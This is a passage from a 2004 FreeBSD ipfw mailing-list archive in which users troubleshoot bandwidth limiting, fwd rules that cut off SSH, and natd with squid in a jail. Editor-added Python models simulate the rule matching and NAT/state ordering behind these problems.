> 128Kbit/s. Luigi wrote, in keep-state rules there are not valid in,
> out, xmit, rule flags, if I understood him correctly...

i said a different thing, please re-read my msg carefully.
and i am done with this thread, sorry!

luigi

From owner-freebsd-ipfw@FreeBSD.ORG Thu Apr 15 06:23:18 2004
From: Ludo Koren
To: rizzo@icir.org
Date: Thu, 15 Apr 2004 15:22:59 +0200 (CEST)
Message-Id: <200404151322.i3FDMxdc055149@lk106.tempest.sk>
In-reply-to: <20040414133828.A16025@xorpc.icir.org> (message from Luigi Rizzo on Wed, 14 Apr 2004 13:38:28 -0700)
cc: ipfw@freebsd.org
cc: tscrum@aaawebsolution.com
Subject: Re: limiting bandwith

Today I put together the correct sequence of rules. So far, it seems to be
working correctly. It was my fault. I made some mistake or had incomplete
rules.

Thanks for your help once again.

Regards, lk

From owner-freebsd-ipfw@FreeBSD.ORG Thu Apr 15 15:20:26 2004
Date: Fri, 16 Apr 2004 01:20:29 +0300
From: hugle
Message-ID: <132203851553.20040416012029@vkt.lt>
To: freebsd-ipfw@freebsd.org
Reply-To: hugle
Subject: ipfw FWD and NOT ME bug while SSHing ?

Hello all.

I've just noticed some problems here.... look: while sshing to the server
after running such command:

bash-2.05b# ipfw add 3032 fwd x.x.x.1 ip from 192.168.0.0/16 to not me && sleep 15 && ipfw delete 3032 &

I got 'disconnected' from ssh for 15 seconds, the console hung up.
But I was able to ping the machine, BUT I wasn't able to ssh to this
machine with its IP 192.168.x.x, while sshing to x.x.x.59 on the same
machine I got IN (and after the rule was automatically removed after
15 sec this console hung up). And after 15 seconds I was able to INPUT
further..

Did anyone meet this problem before?

PS.
03020 5274 4396532 fwd z.z.z.161 ip from 192.168.0.0/16 to not me dst-port 22
A command like that didn't take any effect after adding; I was able to SSH.
--
Best regards,
Hugle

From owner-freebsd-ipfw@FreeBSD.ORG Thu Apr 15 16:48:19 2004
From: hugle
To: freebsd-ipfw@freebsd.org
Date: Fri, 16 Apr 2004 02:48:22 +0300
Message-ID: <20209124174.20040416024822@vkt.lt>
Reply-To: hugle
Subject: Re: ipfw FWD and NOT ME bug while SSHing ?

h> Hello all.
h> I've just noticed some problems here.... look :
h> while sshing to the server after running such command:
h> bash-2.05b# ipfw add 3032 fwd x.x.x.1 ip from 192.168.0.0/16 to
h> not me && sleep 15 && ipfw delete 3032 &
h> I've got 'disconnected' from ssh for 15 seconds, console hung up.
h> But I was able to ping the machine
h> BUT I wasn't able to ssh to this machine with its IP 192.168.x.x while
h> sshing to x.x.x.59 to the same machine I've got IN (and after rule
h> automatically removed after 15 sec this console hung up)
h> And after 15 seconds I was able to INPUT further..
h> Did anyone meet this problem before?
h> PS.
h> 03020 5274 4396532 fwd z.z.z.161 ip from
h> 192.168.0.0/16 to not me dst-port 22
h> command like that didn't take any effect after adding, was able to
h> SSH.

Tried also adding such rules:

fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 112-442
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 445-1862
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 1864-2081
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 2083-3999
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 4001-5049
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 5051-5189
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 5191-6110
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 6120-6665
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 6668-7000
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 8000-9999
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 10001-27014
fwd x.x.x.1 ip from 192.168.0.0/16 to not me dst-port 27016-65000

Also blocked access to SSH. What is the clue?

thanks.
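The symptoms in the two posts above (LAN-address SSH session stalls, public-address session survives, a `dst-port 22` variant has no effect, the port-range variants still break it) are all consistent with one reading: `from 192.168.0.0/16 to not me` has no direction or interface qualifier, so it also matches the server's own replies when those leave with a 192.168.x.x source, and `fwd` then sends them to the next hop instead of the client. The following Python model of ipfw first-match evaluation is an added example by the editor, not code from the list, from hugle or from ipfw; 203.0.113.x addresses are placeholders for the x.x.x.x in the posts, 192.168.1.5/192.168.1.20 are a constructed server and client, and the `in`-qualified rule is an assumed mitigation that the thread itself does not give.

```python
"""Model of how an ipfw rule 'fwd NEXTHOP ip from 192.168.0.0/16 to not me'
matches packets in both directions.  Constructed example: addresses,
ports and the 'in' variant are assumptions, not taken from the thread."""
from dataclasses import dataclass
from ipaddress import IPv4Address, IPv4Network
from typing import Iterable, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    direction: str  # "in" (received by the host) or "out" (being sent)


@dataclass(frozen=True)
class Rule:
    number: int
    action: str                                   # e.g. "fwd 203.0.113.1"
    src: str                                      # 'from <net>'
    dst_not_me: bool = True                       # 'to not me'
    dst_ports: Optional[Tuple[int, int]] = None   # 'dst-port lo-hi'
    direction: Optional[str] = None               # 'in' / 'out' / None (both)


def matches(rule: Rule, pkt: Packet, my_addrs: frozenset) -> bool:
    """True if the packet satisfies every option of the rule."""
    if rule.direction is not None and rule.direction != pkt.direction:
        return False
    if IPv4Address(pkt.src) not in IPv4Network(rule.src):
        return False
    # 'not me': the destination must not be one of the host's own addresses.
    if rule.dst_not_me and pkt.dst in my_addrs:
        return False
    if rule.dst_ports is not None:
        lo, hi = rule.dst_ports
        if not lo <= pkt.dport <= hi:
            return False
    return True


def first_match(rules: Iterable[Rule], pkt: Packet, my_addrs: frozenset):
    """ipfw semantics: the lowest-numbered matching rule decides."""
    for rule in sorted(rules, key=lambda r: r.number):
        if matches(rule, pkt, my_addrs):
            return rule.number
    return None


# The host owns one LAN address and one public address (constructed).
MY_ADDRS = frozenset({"192.168.1.5", "203.0.113.59"})

# The rule from the first post, next hop replaced by a placeholder.
RULE_ORIG = Rule(3032, "fwd 203.0.113.1", "192.168.0.0/16")
# The 'dst-port 22' variant from the PS.
RULE_PORT22 = Rule(3020, "fwd 203.0.113.161", "192.168.0.0/16", dst_ports=(22, 22))
# One of the port-range variants from the follow-up.
RULE_RANGE = Rule(3032, "fwd 203.0.113.1", "192.168.0.0/16", dst_ports=(27016, 65000))
# Assumed mitigation: only forward packets the host *receives* ('in').
RULE_IN_ONLY = Rule(3032, "fwd 203.0.113.1", "192.168.0.0/16", direction="in")

# Constructed SSH session from a LAN client to the host's LAN address.
SSH_REQUEST = Packet("192.168.1.20", 50123, "192.168.1.5", 22, "in")
SSH_REPLY = Packet("192.168.1.5", 22, "192.168.1.20", 50123, "out")
# Reply of a session that was opened to the public address instead.
SSH_REPLY_PUBLIC = Packet("203.0.113.59", 22, "192.168.1.20", 50123, "out")
# A LAN client's packet to the Internet: the traffic the rule is meant for.
LAN_TO_INET = Packet("192.168.1.20", 50200, "203.0.113.80", 80, "in")


def hijacked(rule: Rule, pkt: Packet) -> bool:
    """True if the fwd rule catches the packet and redirects it."""
    return first_match([rule], pkt, MY_ADDRS) is not None


if __name__ == "__main__":
    for name, pkt in [("request", SSH_REQUEST), ("reply", SSH_REPLY),
                      ("reply via public addr", SSH_REPLY_PUBLIC)]:
        print(f"{name:22s} original={hijacked(RULE_ORIG, pkt)} "
              f"port22={hijacked(RULE_PORT22, pkt)} "
              f"range={hijacked(RULE_RANGE, pkt)} in-only={hijacked(RULE_IN_ONLY, pkt)}")
```

The model shows why the `dst-port 22` rule looked harmless: the reply carries 22 as its source port and the client's ephemeral port as its destination, so it misses `dst-port 22` but lands in the wide ranges of the later rules. Restricting the rule with `in` (and, on a real box, `recv <lan-interface>`) keeps it from touching packets the host originates; that qualifier is the editor's assumption and should be verified against ipfw(8) for the FreeBSD version in use.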
From owner-freebsd-ipfw@FreeBSD.ORG Fri Apr 16 14:20:05 2004
From: Igor Popov
Organization: Home
To: ipfw@freebsd.org
Date: Sat, 17 Apr 2004 00:20:59 +0000
Message-Id: <200404170020.59722.IgorPopov@NewMail.RU>
Subject: natd and squid in jail

Hi,

I have a home network that consists of two machines; the first one (freebsd)
has dialup access to the inet. Squid runs on freebsd to allow access to the
inet from my second machine. For the sake of experiment I tried to run squid
in a jail. But it doesn't work with the inet with ipfw and natd, though it
works fine with ipfilter and ipnat and OpenBSD's pf.

These are my ipfw rules:

fwcmd="/sbin/ipfw -q"

# Force a flushing of the current rules before we reload.
$fwcmd -f flush

#automated anti-spoofing
$fwcmd add deny log ip from any to any not verrevpath in recv ng0

#natd
$fwcmd add divert natd all from any to any via ng0

# Allow all localhost connections
$fwcmd add allow all from any to any via lo0
$fwcmd add deny log all from any to 127.0.0.0/8
$fwcmd add deny log all from 127.0.0.0/8 to any

# Allow all connections that have dynamic rules built for them,
# but deny established connections that don't have a dynamic rule.
# See ipfw(8) for details.
$fwcmd add check-state
$fwcmd add deny tcp from any to any established

# Allow all connections from my network card that I initiate
$fwcmd add allow tcp from me to any out xmit any setup keep-state
$fwcmd add deny tcp from me to any
$fwcmd add allow ip from me to any out xmit any keep-state

# This sends a RESET to all ident packets.
$fwcmd add reset log tcp from any to me 113 in recv any

# Enable ICMP
$fwcmd add deny log icmp from any to me icmptypes 8,13
$fwcmd add allow icmp from me to any keep-state

#enable access for squid via localnet
$fwcmd add allow tcp from 192.168.1.0/24 to me dst-port 3128 in recv rl0 setup keep-state

# Enable IPSec
$fwcmd add allow log udp from any to me src-port isakmp dst-port isakmp via rl0 keep-state
$fwcmd add allow esp from any to any via rl0
$fwcmd add allow ah from any to any via rl0

# Deny all the rest.
$fwcmd add deny log ip from any to any

rl0: 192.168.1.1 mask 0xffffff00, 192.168.1.2 mask 0xffffff80

When I do `ipfw -d show` or `tcpdump - ng0`, I see that squid begins a
connection and there is a response, but it can't reach squid.

--
Ten years of rejection slips is nature's way of telling you to stop writing.
-- R. Geis
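One thing a reviewer would check in the ruleset above is the order of `divert natd` relative to `check-state`/`keep-state`: the divert rule sits above both for traffic in either direction. An outgoing connection is therefore translated before the dynamic rule is created, so the dynamic rule records the ng0 address, while the reply is translated back to the private address before `check-state` sees it and no longer matches, falling through to `deny tcp from any to any established`. That would affect squid only inside the jail because a jailed socket is bound to the jail alias 192.168.1.2 (which natd rewrites), whereas squid on the host picks the ng0 address as source and natd leaves it alone. The model below, an added example by the editor rather than code from the thread or from FreeBSD, reproduces that reasoning; it is a hypothesis for the poster to test, not an established diagnosis. All addresses apart from 192.168.1.2 are constructed placeholders.

```python
"""Model of natd (divert) and ipfw dynamic rules (keep-state/check-state)
applied in two different orders.  Constructed example; the ordering
diagnosis is an assumption and the addresses are placeholders."""
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Pkt:
    src: str
    sport: int
    dst: str
    dport: int


NG0_ADDR = "198.51.100.7"    # placeholder for the dialup (ng0) address
JAIL_ADDR = "192.168.1.2"    # the jail alias on rl0, from the post
REMOTE = "203.0.113.80"      # constructed remote web server


class Nat:
    """Minimal natd: rewrite a private source to NG0_ADDR on the way out,
    map the reply back to the private address on the way in."""

    def __init__(self):
        self.table = {}       # public sport -> (private src, private sport)
        self.next_port = 40000

    def out(self, p: Pkt) -> Pkt:
        if p.src == NG0_ADDR:  # already the public address: left untouched
            return p
        port = self.next_port
        self.next_port += 1
        self.table[port] = (p.src, p.sport)
        return replace(p, src=NG0_ADDR, sport=port)

    def inbound(self, p: Pkt) -> Pkt:
        orig = self.table.get(p.dport)
        if orig is None:
            return p
        return replace(p, dst=orig[0], dport=orig[1])


class State:
    """ipfw dynamic rules: keep-state records the 4-tuple of the packet
    that created it; check-state matches either direction of that tuple."""

    def __init__(self):
        self.entries = set()

    def keep(self, p: Pkt) -> None:
        self.entries.add((p.src, p.sport, p.dst, p.dport))

    def check(self, p: Pkt) -> bool:
        return ((p.src, p.sport, p.dst, p.dport) in self.entries
                or (p.dst, p.dport, p.src, p.sport) in self.entries)


def session_works(client_src: str, nat_before_state: bool) -> bool:
    """Simulate one TCP setup from client_src out via ng0 and its SYN/ACK.
    nat_before_state=True is the ruleset in the post: 'divert natd' sits
    above check-state/keep-state for both directions.  Returns True when
    check-state accepts the reply, False when it would fall through to
    'deny tcp from any to any established'."""
    nat, state = Nat(), State()
    syn = Pkt(client_src, 12345, REMOTE, 80)
    if nat_before_state:
        wire = nat.out(syn)   # divert first ...
        state.keep(wire)      # ... so the dynamic rule holds the NATed tuple
    else:
        state.keep(syn)       # keep-state on the private tuple first ...
        wire = nat.out(syn)   # ... then divert on the way out
    synack = Pkt(REMOTE, 80, wire.src, wire.sport)
    # Inbound, divert natd runs before check-state in both orderings.
    local = nat.inbound(synack)
    return state.check(local)


if __name__ == "__main__":
    for src in (NG0_ADDR, JAIL_ADDR):
        print(f"{src:14s} post's order: {session_works(src, True)}  "
              f"state-before-nat outbound: {session_works(src, False)}")
```

In a real ipfw ruleset the second ordering cannot be written just by moving lines, because `allow ... keep-state` ends processing before a later divert would run; the usual pattern is to have the outbound `keep-state` rule `skipto` a later block that diverts to natd and then allows, while inbound packets are diverted first and then hit `check-state`. Whether that is what breaks this particular setup is for the poster to confirm with `ipfw -d show` (the dynamic rule's addresses will show which tuple was recorded).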